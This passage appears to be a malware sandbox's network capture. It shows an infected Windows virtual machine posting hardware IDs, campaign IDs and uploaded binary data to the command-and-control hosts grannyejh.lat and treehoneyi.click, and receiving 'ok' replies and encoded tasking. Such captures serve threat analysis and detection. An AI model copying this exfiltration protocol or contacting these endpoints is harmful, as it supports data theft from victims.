2024-12-19 09:15:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	50427	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:23 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: grannyejh.lat
2024-12-19 09:15:23 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:15:36 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c40k2l09nidlkhtp3tq8vmr008; expires=Mon, 14 Apr 2025 03:02:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VY5Cw5CcDY5AXxpDguqNpT0e%2Br%2B8MEgPPDyTw49XrehagLRn7RTsD%2BM33ZQCvtCnvo5F%2B9%2B482X6gHJ2kwmXuW5JofIpvLqlM3S1S7eFliaW5anCdQPlPh7uOemTMenR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4649afeacc431a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1633&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=979&delivery_rate=1775075&cwnd=224&unsent_bytes=0&cid=e1299f19d1438ef1&ts=13612&x=0"
2024-12-19 09:15:36 UTC	214	IN	Data Raw: 64 30 0d 0a 77 62 6e 55 50 55 61 4c 59 66 35 51 34 4d 6c 30 2b 72 2f 55 79 51 71 68 77 6e 4f 4c 75 72 6f 6d 46 2b 41 78 67 37 30 74 58 58 75 61 77 76 5a 49 5a 4c 46 44 6c 69 53 55 75 55 36 6d 6b 49 6a 6d 4f 35 6e 33 58 62 6d 4c 6a 77 67 6d 30 51 4b 74 6a 42 73 42 56 4b 37 66 73 6d 46 70 37 77 53 59 66 6f 57 78 45 64 69 54 39 71 39 2b 67 2f 68 44 70 35 6a 66 42 43 33 51 54 4b 2f 47 44 79 68 5a 2b 35 75 38 53 54 4c 37 57 36 4a 2f 76 4f 5a 46 77 6f 72 36 2b 7a 75 55 37 45 4b 36 69 5a 51 58 49 62 77 65 38 4d 6c 49 50 42 61 64 6c 71 5a 63 4b 4f 38 4f 6b 33 36 46 73 52 48 59 6b 2f 61 76 66 6f 50 34 51 36 65 59 33 77 51 74 30 45 7a 65 0d 0a Data Ascii: d0wbnUPUaLYf5Q4Ml0+r/UyQqhwnOLuromF+Axg70tXXuawvZIZLFDliSUuU6mkIjmO5n3XbmLjwgm0QKtjBsBVK7fsmFp7wSYfoWxEdiT9q9+g/hDp5jfBC3QTK/GDyhZ+5u8STL7W6J/vOZFwor6+zuU7EK6iZQXIbwe8MlIPBadlqZcKO8Ok36FsRHYk/avfoP4Q6eY3wQt0Eze
2024-12-19 09:15:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	50430	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:29 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U52F16NHTVC9SMLQ02 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1281 Host: treehoneyi.click
2024-12-19 09:15:29 UTC	1281	OUT	Data Raw: 2d 2d 55 35 32 46 31 36 4e 48 54 56 43 39 53 4d 4c 51 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 35 32 46 31 36 4e 48 54 56 43 39 53 4d 4c 51 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 35 32 46 31 36 4e 48 54 56 43 39 53 4d 4c 51 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 53 75 70 70 6f Data Ascii: --U52F16NHTVC9SMLQ02Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--U52F16NHTVC9SMLQ02Content-Disposition: form-data; name="pid"1--U52F16NHTVC9SMLQ02Content-Disposition: form-data; name="lid"rAGxSF--Suppo
2024-12-19 09:15:42 UTC	1124	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ofrqmki1f55r9ffnf71e1sfdch; expires=Mon, 14 Apr 2025 03:02:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUZbFlMMQY83PkcI8LZgZ0HUN%2FemtbNdx5%2BpYYUBe14aOyA%2BbIG16lTTSCkG8HeMBfs4FQf7iEQrqqHwQZfcAK0ZuUdaUYRrPsJm3HEnZnhwL09QDfAcEV1l3Ep66nmuuyHE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4649d3f8c580dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1605&rtt_var=615&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2198&delivery_rate=1759036&cwnd=147&unsent_bytes=0&cid=e5c06a6f0bad3fc4&ts=13705&x=0"
2024-12-19 09:15:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	50431	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:29 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4C8I10NL07FPLX46W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12853 Host: grannyejh.lat
2024-12-19 09:15:29 UTC	12853	OUT	Data Raw: 2d 2d 34 43 38 49 31 30 4e 4c 30 37 46 50 4c 58 34 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 43 38 49 31 30 4e 4c 30 37 46 50 4c 58 34 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 43 38 49 31 30 4e 4c 30 37 46 50 4c 58 34 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --4C8I10NL07FPLX46WContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--4C8I10NL07FPLX46WContent-Disposition: form-data; name="pid"2--4C8I10NL07FPLX46WContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-19 09:15:43 UTC	1117	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cb0vj2bv5ujah3a7bmjvk3oe1h; expires=Mon, 14 Apr 2025 03:02:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uYxD8YyXzDaYg3edcli2K91DA0jwpc02dTiwD4YdzkMQT5cf2%2BAOaxeZYKkGTafFXKryy4sSqStGlSZ1P26wRHedZ1KFruSo2QmQS9anjI9WDVfXSqMdmbZIbIw5JjiF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4649d3fc910c9e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=612&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13789&delivery_rate=1771844&cwnd=32&unsent_bytes=0&cid=d908c6b03d1a00c7&ts=13985&x=0"
2024-12-19 09:15:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	50438	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:44 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P1P9OQ9M3PVVDTQ073Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29580 Host: treehoneyi.click
2024-12-19 09:15:44 UTC	15331	OUT	Data Raw: 2d 2d 50 31 50 39 4f 51 39 4d 33 50 56 56 44 54 51 30 37 33 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 31 50 39 4f 51 39 4d 33 50 56 56 44 54 51 30 37 33 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 31 50 39 4f 51 39 4d 33 50 56 56 44 54 51 30 37 33 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 53 75 Data Ascii: --P1P9OQ9M3PVVDTQ073ZContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--P1P9OQ9M3PVVDTQ073ZContent-Disposition: form-data; name="pid"1--P1P9OQ9M3PVVDTQ073ZContent-Disposition: form-data; name="lid"rAGxSF--Su
2024-12-19 09:15:44 UTC	14249	OUT	Data Raw: 1d 0c 10 f1 55 08 2a 40 d5 15 bc a3 14 96 1b 59 e7 f3 0d 82 16 5a 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d Data Ascii: U*@YZanZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom
2024-12-19 09:15:57 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=90ubs7etf0998uvpjb87iuc7bn; expires=Mon, 14 Apr 2025 03:02:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0HcgyeVTvdE70eLx9%2F4mF6pNDHP%2Flwe5CXNlGO3OLtFHjB2FdhgKjcYgYaTlX7cm257%2BXWhvdXhZkrdkYFPzvnCbkjUBrTqtFUvbPCtc%2Fu8t%2Bf5qepK4Wed8PeNsk3diYDoj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464a31fac37d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1951&rtt_var=742&sent=20&recv=33&lost=0&retrans=0&sent_bytes=2840&recv_bytes=30565&delivery_rate=1463659&cwnd=205&unsent_bytes=0&cid=4687d7c6f1cd6b25&ts=13506&x=0"
2024-12-19 09:15:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	50439	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:44 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3106SGD908W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15063 Host: grannyejh.lat
2024-12-19 09:15:44 UTC	15063	OUT	Data Raw: 2d 2d 33 31 30 36 53 47 44 39 30 38 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 31 30 36 53 47 44 39 30 38 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 31 30 36 53 47 44 39 30 38 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 31 30 36 53 47 44 39 30 38 57 0d 0a 43 6f 6e 74 Data Ascii: --3106SGD908WContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--3106SGD908WContent-Disposition: form-data; name="pid"2--3106SGD908WContent-Disposition: form-data; name="lid"PsFKDg--pablo--3106SGD908WCont
2024-12-19 09:15:57 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=41cs8dbq4ja411g3tmf71fk53l; expires=Mon, 14 Apr 2025 03:02:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yVf%2BVRGtDscumuIk83QAV%2BQ8EWYnT1M56HAEhmNavnP4v9qhHxzKNBDrjuuGOTBPHAvwV0u4mSehJjUOeOGAaLOgOn4lqDf8RJZEFZvmFzh0bsoAth6V5%2FOZGekEGzQB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464a32c9001795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1464&rtt_var=564&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15993&delivery_rate=1914754&cwnd=172&unsent_bytes=0&cid=ef019b87a11727fd&ts=13341&x=0"
2024-12-19 09:15:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	50444	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:54 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4a 62 7a 32 4c 6a 57 52 6f 6b 6d 35 66 47 75 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 34 37 39 30 37 66 39 37 66 32 32 39 61 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: Jbz2LjWRokm5fGuo.1Context: ed47907f97f229ad
2024-12-19 09:15:54 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:15:54 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4a 62 7a 32 4c 6a 57 52 6f 6b 6d 35 66 47 75 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 34 37 39 30 37 66 39 37 66 32 32 39 61 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Jbz2LjWRokm5fGuo.2Context: ed47907f97f229ad<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:15:54 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4a 62 7a 32 4c 6a 57 52 6f 6b 6d 35 66 47 75 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 34 37 39 30 37 66 39 37 66 32 32 39 61 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: Jbz2LjWRokm5fGuo.3Context: ed47907f97f229ad<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:15:55 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:15:55 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 58 66 38 41 54 53 66 49 4d 30 79 78 6f 65 54 68 39 72 76 49 76 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Xf8ATSfIM0yxoeTh9rvIvg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	50447	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:58 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 84 Host: treehoneyi.click
2024-12-19 09:15:58 UTC	84	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 72 41 47 78 53 46 2d 2d 53 75 70 70 6f 72 74 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=rAGxSF--Support&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:16:13 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:16:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5al87vvaq3c2ir6joidvcet09i; expires=Mon, 14 Apr 2025 03:02:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sa8Dzw6XAqmJX6h6yX85u5qEVAarJXnmLI5dRr7G98evlRQRndlQeDGMeBU4j3qEvpaaBnGrkcKKWVfdRdzxLVHGLf7Uc48hDOLp8%2F9Sgyn1pihcDI5NbBtQ%2FUSoYCPT%2Fw8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464a8ebc970f85-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1723&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=984&delivery_rate=1694718&cwnd=204&unsent_bytes=0&cid=86da43e4a0a71ad6&ts=14980&x=0"
2024-12-19 09:16:13 UTC	54	IN	Data Raw: 33 30 0d 0a 51 79 6f 2f 61 31 67 6c 4a 33 46 51 75 39 73 71 32 78 49 49 73 79 43 46 4e 72 69 4f 4c 39 37 35 33 6e 54 6f 46 53 52 68 73 50 51 59 64 77 3d 3d 0d 0a Data Ascii: 30Qyo/a1glJ3FQu9sq2xIIsyCFNriOL9753nToFSRhsPQYdw==
2024-12-19 09:16:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	50448	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
